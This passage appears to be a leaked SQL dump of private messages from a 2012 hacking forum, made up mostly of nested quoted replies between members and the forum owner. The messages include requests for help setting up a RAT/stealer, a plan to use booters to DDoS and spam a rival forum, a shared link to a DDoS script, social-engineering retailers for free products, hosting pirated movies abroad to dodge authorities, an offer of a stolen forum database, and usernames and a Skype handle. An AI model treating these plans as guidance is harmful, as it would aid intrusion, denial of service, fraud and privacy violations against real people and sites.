mind lol I am in a tired state of mind.\r\n[/quote]\r\n\r\nWhy what\'s up?\r\n[/quote]\r\nI do not sleep enough, sports, life etc :/\r\n[/quote]\r\n\r\nMy life is worse. \r\n[/quote]\r\nWhat up? :o', '1349238092', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2351', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My IP address banned', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'mothered\']\r\nHey mate,\r\n\r\nI tried logging In, but this message came up that my IP has been banned:\r\n\r\n[IMG] http://i48.tinypic.com/214rpkp.png [/IMG]\r\n\r\nI\'m navigating via a proxy, and It\'s just too slow, hence can\'t browse the forums....\r\n[/quote]\r\n\r\nSorry for the inconvience. I mistakenly banned your IP through cloudflare because on Saturday night LH was receiving DDoS attacks.\r\n[/quote]\r\n\r\nNo problem at all.\r\n\r\nI Initially thought you may have banned a range of IPs via the ACP, and mine fell Into that range.\r\nAll good now :)', '1349238622', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2353', '100', '203', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'RAT\'ing/Stealer Help', '0', 'Hey man, so you think you could help me out this weekend over skype & teamviewer with setting up my RAT/stealer? thanks!', '1349312949', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2359', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', ':Yea sounds pretty shitty. D:\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nSorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do.\r\n[/quote]\r\nIt Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3\r\n[/quote]\r\n\r\nWhat? \r\n[/quote]\r\nNever mind lol I am in a tired state of mind.\r\n[/quote]\r\n\r\nWhy what\'s up?\r\n[/quote]\r\nI do not sleep enough, sports, life etc :/\r\n[/quote]\r\n\r\nMy life is worse. \r\n[/quote]\r\nWhat up? :o\r\n[/quote]\r\nATM waiting for computer (No PC atm), phone broken, no income from LH so far and need money to run LH, school starts at 7:30 and have to be 10 mins early for attendence(sucks) and no GF \r\n[/quote]', '1349320620', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2362', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', 'I only have the one account. :/ \r\n[quote=\'t3h jok3r\']\r\nTrue btw do you have any fake accounts on HF? I really need to advertise on HF because that\'s the only place where I can get HQ members to stay on LH. \r\n[quote=\'Apathy\']\r\n:Yea sounds pretty shitty. D:\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nSorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do.\r\n[/quote]\r\nIt Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3\r\n[/quote]\r\n\r\nWhat? \r\n[/quote]\r\nNever mind lol I am in a tired state of mind.\r\n[/quote]\r\n\r\nWhy what\'s up?\r\n[/quote]\r\nI do not sleep enough, sports, life etc :/\r\n[/quote]\r\n\r\nMy life is worse. \r\n[/quote]\r\nWhat up? :o\r\n[/quote]\r\nATM waiting for computer (No PC atm), phone broken, no income from LH so far and need money to run LH, school starts at 7:30 and have to be 10 mins early for attendence(sucks) and no GF \r\n[/quote]\r\n[/quote]\r\n[/quote]', '1349321068', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2367', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My IP address banned', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'mothered\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'mothered\']\r\nHey mate,\r\n\r\nI tried logging In, but this message came up that my IP has been banned:\r\n\r\n[IMG] http://i48.tinypic.com/214rpkp.png [/IMG]\r\n\r\nI\'m navigating via a proxy, and It\'s just too slow, hence can\'t browse the forums....\r\n[/quote]\r\n\r\nSorry for the inconvience. I mistakenly banned your IP through cloudflare because on Saturday night LH was receiving DDoS attacks.\r\n[/quote]\r\n\r\nNo problem at all.\r\n\r\nI Initially thought you may have banned a range of IPs via the ACP, and mine fell Into that range.\r\nAll good now :)\r\n[/quote]\r\n\r\nThanks so do you like LH so far? \r\n[/quote]\r\n\r\nYeah, It\'s quite a nice friendly environment to hang out. The theme reminds me of the old LH (l33thackers), but evidently, this one\'s a lot more relaxed and pleasing to navigate around.\r\n\r\nGood work with It :)', '1349326462', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2776', '3', '3', '1', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"3\";}}', '1', 'Re: Yo', '0', '[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nHey joker, are reg members able to neg rep?\r\n[/quote]\r\n\r\nDude I swear to god I was about to PM you. Anyway, I need a new Mod not the best I can do but are you interested?\r\n\r\nI don\'t think they can. \r\n[/quote]\r\nYes I am interested but I would prefer staff or admin but mod is okay for right now. Also since Itzipod or whatever his name is isnt mod or upgraded member could you remove his neg off of me?\r\n[/quote]\r\n\r\nDone and OK.\r\n[/quote]\r\nThanks man, and thats why I love you NO HOMO\r\n[/quote]\r\n\r\nLOL btw I\'m planning an attack on AF are you interestd? If not then it\'s cool np. \r\n[/quote]\r\nYes I am interested just hit me up with the info.\r\n[/quote]\r\n\r\nTomorrow I\'m getting access to HF, so I will get their booters to hit Anarchy the whole week I will create fake accounts and SPAM anarchy.', '1349735475', '0', '3', '1349735757', '1', '0', '0', '1349735742'); INSERT INTO mybb_privatemessages VALUES('2370', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', 'We do not have movie rips?\r\n[quote=\'t3h jok3r\']\r\nOK, ask your friends if they are interested in learning SEing, getting PIDs, movie rips etc. \r\n\r\n[quote=\'Apathy\']\r\nI only have the one account. :/ \r\n[quote=\'t3h jok3r\']\r\nTrue btw do you have any fake accounts on HF? I really need to advertise on HF because that\'s the only place where I can get HQ members to stay on LH. \r\n[quote=\'Apathy\']\r\n:Yea sounds pretty shitty. D:\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nSorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do.\r\n[/quote]\r\nIt Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3\r\n[/quote]\r\n\r\nWhat? \r\n[/quote]\r\nNever mind lol I am in a tired state of mind.\r\n[/quote]\r\n\r\nWhy what\'s up?\r\n[/quote]\r\nI do not sleep enough, sports, life etc :/\r\n[/quote]\r\n\r\nMy life is worse. \r\n[/quote]\r\nWhat up? :o\r\n[/quote]\r\nATM waiting for computer (No PC atm), phone broken, no income from LH so far and need money to run LH, school starts at 7:30 and have to be 10 mins early for attendence(sucks) and no GF \r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]', '1349350334', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2373', '100', '203', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: RAT\'ing/Stealer Help', '0', '[quote=\'NeonLights\']\r\n[quote=\'iTzGRONgamer61\']\r\nHey man, so you think you could help me out this weekend over skype & teamviewer with setting up my RAT/stealer? thanks!\r\n[/quote]\r\n\r\nsure but im not available this weekend im gonne camping ;)\r\nbut im available friday all day\r\n\r\nwhats ur skype?\r\n[/quote]\r\n\r\nskype is gavmanex\r\n\r\nI\'ll be able to voice chat later in the day friday, around 5:00-5:30\r\n', '1349373852', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2775', '3', '1', '3', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Yo', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'??????????¢™\']\r\nHey joker, are reg members able to neg rep?\r\n[/quote]\r\n\r\nDude I swear to god I was about to PM you. Anyway, I need a new Mod not the best I can do but are you interested?\r\n\r\nI don\'t think they can. \r\n[/quote]\r\nYes I am interested but I would prefer staff or admin but mod is okay for right now. Also since Itzipod or whatever his name is isnt mod or upgraded member could you remove his neg off of me?\r\n[/quote]\r\n\r\nDone and OK.\r\n[/quote]\r\nThanks man, and thats why I love you NO HOMO\r\n[/quote]\r\n\r\nLOL btw I\'m planning an attack on AF are you interestd? If not then it\'s cool np. \r\n[/quote]\r\nYes I am interested just hit me up with the info.', '1349735362', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2404', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', 'Never noticed :o can\'t you get in trouble for that?\r\n[quote=\'t3h jok3r\']\r\n\r\nWe do under the movies section.\r\n[quote=\'Apathy\']\r\nWe do not have movie rips?\r\n[quote=\'t3h jok3r\']\r\nOK, ask your friends if they are interested in learning SEing, getting PIDs, movie rips etc. \r\n\r\n[quote=\'Apathy\']\r\nI only have the one account. :/ \r\n[quote=\'t3h jok3r\']\r\nTrue btw do you have any fake accounts on HF? I really need to advertise on HF never because that\'s the only place where I can get HQ members to stay on LH. \r\n[quote=\'Apathy\']\r\n:Yea sounds pretty shitty. D:\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nSorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do.\r\n[/quote]\r\nIt Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3\r\n[/quote]\r\n\r\nWhat? \r\n[/quote]\r\nNever mind lol I am in a tired state of mind.\r\n[/quote]\r\n\r\nWhy what\'s up?\r\n[/quote]\r\nI do not sleep enough, sports, life etc :/\r\n[/quote]\r\n\r\nMy life is worse. \r\n[/quote]\r\nWhat up? :o\r\n[/quote]\r\nATM waiting for computer (No PC atm), phone broken, no income from LH so far and need money to run LH, school starts at 7:30 and have to be 10 mins early for attendence(sucks) and no GF \r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]', '1349409750', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2407', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: reborn', '0', 'Sounds good. :) Nice homework btw. xD so wassup? I might make a nice signature or something related for the site tomorrow. What would you like on it?\r\n[quote=\'t3h jok3r\']\r\nTrue I can but I like doing my homework and now this is what I have worked out. Omni wants to keep his site clean so omni would never allow rips which means we can use HF as a major traffic grabbing website.\r\n\r\nAnyway,\r\n\r\nWe have a .net domain which means it will belong to the hostings server location and we are hosted in Russia so FBI can\'t take down our website. Well no authority in the USA can because we are hosted outside of the US and we don\'t even have to pay tax as nothing belongs in US. When it comes to movie copyright infringement they can send a DMCA Take Down Notice and we will remove the thread but if you go into the section, all the links should be online streaming so any issues should FIRST be resolved with the streaming website then us. If we had downloads then we would fall under distribution of Copyright Infringement but we don\'t distribute, all the content is already online. I also said in the sticky in the movie rips thread that all the links should be publicly online and not their private streams.\r\n\r\nSo we are safe. \r\n\r\n[quote=\'Apathy\']\r\nNever noticed :o can\'t you get in trouble for that?\r\n[quote=\'t3h jok3r\']\r\n\r\nWe do under the movies section.\r\n[quote=\'Apathy\']\r\nWe do not have movie rips?\r\n[quote=\'t3h jok3r\']\r\nOK, ask your friends if they are interested in learning SEing, getting PIDs, movie rips etc. \r\n\r\n[quote=\'Apathy\']\r\nI only have the one account. :/ \r\n[quote=\'t3h jok3r\']\r\nTrue btw do you have any fake accounts on HF? I really need to advertise on HF never because that\'s the only place where I can get HQ members to stay on LH. \r\n[quote=\'Apathy\']\r\n:Yea sounds pretty shitty. D:\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'Apathy\']\r\n[quote=\'t3h jok3r\']\r\nSorry man I couldn\'t dis Uss it with you. I waited for you on Skype but you didn\'t come nonlinear. I gave him a chance because he said he wants to come back to LH cud he is banned on HF I think and he has nothing to do.\r\n[/quote]\r\nIt Is all good man. I have been a bit busy for skype with life. I went on like a hour ago though. :3\r\n[/quote]\r\n\r\nWhat? \r\n[/quote]\r\nNever mind lol I am in a tired state of mind.\r\n[/quote]\r\n\r\nWhy what\'s up?\r\n[/quote]\r\nI do not sleep enough, sports, life etc :/\r\n[/quote]\r\n\r\nMy life is worse. \r\n[/quote]\r\nWhat up? :o\r\n[/quote]\r\nATM waiting for computer (No PC atm), phone broken, no income from LH so far and need money to run LH, school starts at 7:30 and have to be 10 mins early for attendence(sucks) and no GF \r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]\r\n[/quote]', '1349410669', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2410', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My IP address banned', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'mothered\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'mothered\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'mothered\']\r\nHey mate,\r\n\r\nI tried logging In, but this message came up that my IP has been banned:\r\n\r\n[IMG] http://i48.tinypic.com/214rpkp.png [/IMG]\r\n\r\nI\'m navigating via a proxy, and It\'s just too slow, hence can\'t browse the forums....\r\n[/quote]\r\n\r\nSorry for the inconvience. I mistakenly banned your IP through cloudflare because on Saturday night LH was receiving DDoS attacks.\r\n[/quote]\r\n\r\nNo problem at all.\r\n\r\nI Initially thought you may have banned a range of IPs via the ACP, and mine fell Into that range.\r\nAll good now :)\r\n[/quote]\r\n\r\nThanks so do you like LH so far? \r\n[/quote]\r\n\r\nYeah, It\'s quite a nice friendly environment to hang out. The theme reminds me of the old LH (l33thackers), but evidently, this one\'s a lot more relaxed and pleasing to navigate around.\r\n\r\nGood work with It :)\r\n[/quote]\r\n\r\nThanks and yeah many people say that I RIPPED their theme but the truth is that this theme is free online and no one uses this because this theme is corrupted. \r\n[/quote]\r\n\r\nYeah I know, I\'ve seen this theme being available for free. Doesn\'t matter what others think. They should get their facts right first.', '1349414198', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2412', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My site', '0', 'Hey mate,\r\n\r\nGiven that my site Is not a forum and not competitive to l33thacking, would I be able to put It In my signature, just like I\'ve done with Ubers?\r\n\r\nHere\'s the site: http://www.windows8hacker.com/\r\n\r\nIf no, then I understand. ', '1349414896', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2417', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Advertising', '0', 'Greetings.\r\n\r\nI noticed you (or one of your users) were advertising on [url=http://www.anarchyforums.net]our site[/url].\r\nAdvertising on competing forums isn\'t a very reputable way of expanding.\r\n\r\nRegardless of if it was you, or one of your members I have contacted you in the interest of doing business. Since your forum is small like ours, I would be interested in purchasing it, or doing a merger. \r\n\r\nAll of your users would retain their positions (except for staff), posts would be kept, and I could pay you a decent amount of money if you choose to give up administrator. If you would like to retain administrator, we can discuss your price further. \r\n\r\nI believe it would be in the best interest of both of our sites to work together somehow, as we have many active users online currently. We have 30+ active users, and it would be awesome to work with you.\r\n\r\nLet me know if you are interested in making some money, or working together. :cool:\r\n\r\nThe Anarchist,\r\nOwner of Anarchy Forums\r\n\r\n', '1349444686', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2429', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey Im back . I have a error', '0', 'Hey I came back from my school trip.\r\nBut I cant access this site. with my normal browser. I m writing this pm over the tor browser. Is it posssible that you have banned me?\r\n\r\n\r\nThe owner of this website (l33thacking.net) has banned your IP address (188.155-----). (Ref. 1006)\r\n\r\n Timestamp: Fri, 05 Oct 2012 10:41:30 -0700\r\n\r\n Your IP address: 188.155-----\r\n\r\n Requested URL: l33thacking.net/\r\n\r\n Error reference number: 1006\r\n\r\n Server ID: FL_18F1\r\n\r\n Process ID: PID_1349458890.150-1-1218762472\r\n\r\n User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1\r\n', '1349458995', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2443', '243', '1', '243', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Advertising', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'The Anarchist\']\r\nGreetings.\r\n\r\nI noticed you (or one of your users) were advertising on [url=http://www.anarchyforums.net]our site[/url].\r\nAdvertising on competing forums isn\'t a very reputable way of expanding.\r\n\r\nRegardless of if it was you, or one of your members I have contacted you in the interest of doing business. Since your forum is small like ours, I would be interested in purchasing it, or doing a merger. \r\n\r\nAll of your users would retain their positions (except for staff), posts would be kept, and I could pay you a decent amount of money if you choose to give up administrator. If you would like to retain administrator, we can discuss your price further. \r\n\r\nI believe it would be in the best interest of both of our sites to work together somehow, as we have many active users online currently. We have 30+ active users, and it would be awesome to work with you.\r\n\r\nLet me know if you are interested in making some money, or working together. :cool:\r\n\r\nThe Anarchist,\r\nOwner of Anarchy Forums\r\n\r\n\r\n[/quote]\r\n\r\nFirstly, I apologize behalf of my forum for advertising a competing website on your forums. Is it possible that I could get a copy of the PM?\r\n\r\nSecondly, Thanks for the offer but I\'m not interested however if you sell your DB to me then I will pay a good price for it, make you an Admin and you will earn 30% of whatever I earn.\r\n\r\nLastly, Don\'t take me wrong but you haven\'t taken out time to secure your site, you don\'t have as much HQ & DAILY Active members that I have and we have more content then your site so it\'s better for you to move into my website plus I will give you a written guarantee that you will not be removed from your Admin spot for an year and you will earn 30% from whatever I earn. \r\n\r\nI have worked out too many deals and paid a lot of advertising and my website is planning to hit 1K HQ threads under the next 40 days.\r\n[/quote]\r\n\r\nActually, our site is fairly secure. We have no intentions of merging, and I am not interested in selling our database.\r\n\r\nHowever, if you\'re interested in buying databases, I can offer you Blackmarket.cc\'s old database (unmodified). Their forum was quite large.\r\n\r\nLet me know if you change your mind. :cool:\r\nI\'m sure you will eventually.\r\n\r\nHere\'s the PM:\r\n[quote=\'lily\']\r\nHi,\r\n\r\nI run a blackhat forum similar to HF but with less rules and more blackhat discussions such as phi$hing, PIDs, Social Enginering, Movie RIPs, Premium Accounts and much more. We are kinda new because our site was launched about 2 months ago but we already have 655+ HQ threads and 15+ daily active members. All our downloads are public which means no post here and PM me BS. Give our forum a try and we will make sure you won\'t regret it. In return we can even provide you a free lifetime forum upgrade.\r\n\r\nLink: http://l33thacking.net/\r\n[/quote]\r\n\r\nRegarding users and posts, we actually have more, with over 20 users online as I speak (on Skype).\r\n\r\nIf you do change your mind, contact me via our site.\r\n\r\n- The Anarchist,\r\nOwner of Anarchy Forums.', '1349462157', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2449', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'ohhidur', '0', 'I got this message....\r\n\r\nI run a blackhat forum similar to HF but with less rules and more blackhat discussions such as phi$hing, PIDs, Social Enginering, Movie RIPs, Premium Accounts and much more. We are kinda new because our site was launched about 2 months ago but we already have 655+ HQ threads and 15+ daily active members. All our downloads are public which means no post here and PM me BS. Give our forum a try and we will make sure you won\'t regret it. In return we can even provide you a free lifetime forum upgrade.\r\n\r\nWhen will I be able to receive premium :D', '1349463095', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2451', '222', '1', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hello', '0', '[quote=\'t3h jok3r\']\r\nFirstly, Welcome to L33THacking and thanks for signing up.\r\n\r\nSecondly, I found out about the PM and found out that one of my staff members were advertising on AF. Anyway, since you did sign up and actually started contributing so I will provide you with a upgrade and just to let you know what differs LH and other sites is that l33thacking has a Movie RIPs section, PIDs, Social Engineering, Premium Accounts, Cracked programs sections and much more.\r\n\r\nI will upgrade you when I get back home. \r\n[/quote]\r\n\r\noh haha disregard my other message then :P', '1349463153', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2457', '62', '1', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Sup', '0', '[quote=\'t3h jok3r\']\r\nIs your real name Logan Turner? \r\n[/quote]\r\n\r\nnope why?\r\nnot even close to logan turner :/', '1349472716', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2459', '62', '203', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"203\";}}', '2', 'Re: fianlly ur on', '0', '[quote=\'NeonLights\']\r\ndid u chec kmy request in ur gfx thread :D::DD::D:D:D:D:D:D:D:D:D:D::D:D:D:D:E\r\n[/quote]\r\n\r\ni saw it bro, however I\'m short on time :(\r\ni dunno how you want the big worm though, mind explaining.', '1349472757', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2515', '205', '1', '205', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: My site', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'mothered\']\r\nHey mate,\r\n\r\nGiven that my site Is not a forum and not competitive to l33thacking, would I be able to put It In my signature, just like I\'ve done with Ubers?\r\n\r\nHere\'s the site: http://www.windows8hacker.com/\r\n\r\nIf no, then I understand. \r\n[/quote]\r\n\r\nSure it\'s not a problem. \r\n[/quote]\r\n\r\nThanks bud, really appreciate It.\r\n\r\nJust wanted to check with your first, before making any decisions. ', '1349500195', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2517', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey Im back . I have a error', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\nHey I came back from my school trip.\r\nBut I cant access this site. with my normal browser. I m writing this pm over the tor browser. Is it posssible that you have banned me?\r\n\r\n\r\nThe owner of this website (l33thacking.net) has banned your IP address (188.155-----). (Ref. 1006)\r\n\r\n Timestamp: Fri, 05 Oct 2012 10:41:30 -0700\r\n\r\n Your IP address: 188.155-----\r\n\r\n Requested URL: l33thacking.net/\r\n\r\n Error reference number: 1006\r\n\r\n Server ID: FL_18F1\r\n\r\n Process ID: PID_1349458890.150-1-1218762472\r\n\r\n User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1\r\n\r\n[/quote]\r\n\r\nI did ban you but not intentionally. Well few days ago LH received a heavy DDoS attack so I increased the security level and when it did what happened was that it marked everyone on the site as a threat so I mass banned them so I mistakenly banned many legit members such as mothered, Ipod, Grongamer and many more. Can I have your real IP? \r\n[/quote]\r\n\r\nHey\r\n\r\nIm unbanned. Everything is fine. Did you lower the security level again? I hope it stays like this.\r\n', '1349514757', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2519', '100', '225', '100', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"225\";}}', '2', 'Re: Ello!', '0', '[quote=\'Graycat\']\r\nEyy ima friend of NXK, and i was wondering if you could hook me up with that drdos script. thanks in advance\r\n[/quote]\r\n\r\nSure thing, heres the pastebin. http://pastebin.com/EgnhCsGm', '1349524000', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2524', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey Im back . I have a error', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\n[quote=\'t3h jok3r\']\r\n[quote=\'sirchamp\']\r\nHey I came back from my school trip.\r\nBut I cant access this site. with my normal browser. I m writing this pm over the tor browser. Is it posssible that you have banned me?\r\n\r\n\r\nThe owner of this website (l33thacking.net) has banned your IP address (188.155-----). (Ref. 1006)\r\n\r\n Timestamp: Fri, 05 Oct 2012 10:41:30 -0700\r\n\r\n Your IP address: 188.155-----\r\n\r\n Requested URL: l33thacking.net/\r\n\r\n Error reference number: 1006\r\n\r\n Server ID: FL_18F1\r\n\r\n Process ID: PID_1349458890.150-1-1218762472\r\n\r\n User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0.1\r\n\r\n[/quote]\r\n\r\nI did ban you but not intentionally. Well few days ago LH received a heavy DDoS attack so I increased the security level and when it did what happened was that it marked everyone on the site as a threat so I mass banned them so I mistakenly banned many legit members such as mothered, Ipod, Grongamer and many more. Can I have your real IP? \r\n[/quote]\r\n\r\nHey\r\n\r\nIm unbanned. Everything is fine. Did you lower the security level again? I hope it stays like this.\r\n\r\n[/quote]\r\n\r\nNope, the message you sent me said the IP 188.155.XXXX so I searched up all the IPs on 188.155 and there was only one so I thought it was yours. \r\n[/quote]\r\n\r\nOh sorry. I hope it wasnt much work. Thanks for unbanning me.', '1349557835', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2526', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'me', '0', 'Did you seriously just post my name on forums..?\r\ns', '1349559695', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2528', '62', '222', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'se keyboard', '0', 'could you help me on this bro?', '1349565633', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2530', '222', '62', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: se keyboard', '0', '[quote=\'R?????zo?\']\r\ncould you help me on this bro?\r\n[/quote]\r\n\r\nyeh what kind...logitech right', '1349566663', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2532', '62', '222', '62', 'a:1:{s:2:\"to\";a:1:{i:0;s:3:\"222\";}}', '2', 'Re: se keyboard', '0', '[quote=\'flamingworm\']\r\n[quote=\'R?????zo?\']\r\ncould you help me on this bro?\r\n[/quote]\r\n\r\nyeh what kind...logitech right\r\n[/quote]\r\n\r\nyeah if its logitech, what keyboard can you SE from them', '1349567270', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2534', '222', '62', '222', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"62\";}}', '2', 'Re: se keyboard', '0', '[quote=\'R?????zo?\']\r\n[quote=\'flamingworm\']\r\n[quote=\'R?????zo?\']\r\ncould you help me on this bro?\r\n[/quote]\r\n\r\nyeh what kind...logitech right\r\n[/quote]\r\n\r\nyeah if its logitech, what keyboard can you SE from them\r\n[/quote]\r\n\r\nI can do them all lol.....', '1349568790', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO mybb_privatemessages VALUES('2538', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: me', '0', '[quote=\'t3h jok3r\']\r\n[quote=\'NXK\']\r\nDid you seriously just post my name on forums..?\r\ns\r\n[/quote]\r\n\r\nDamn I thought it was Reloadzor. Sorry but I was going to junk the thread 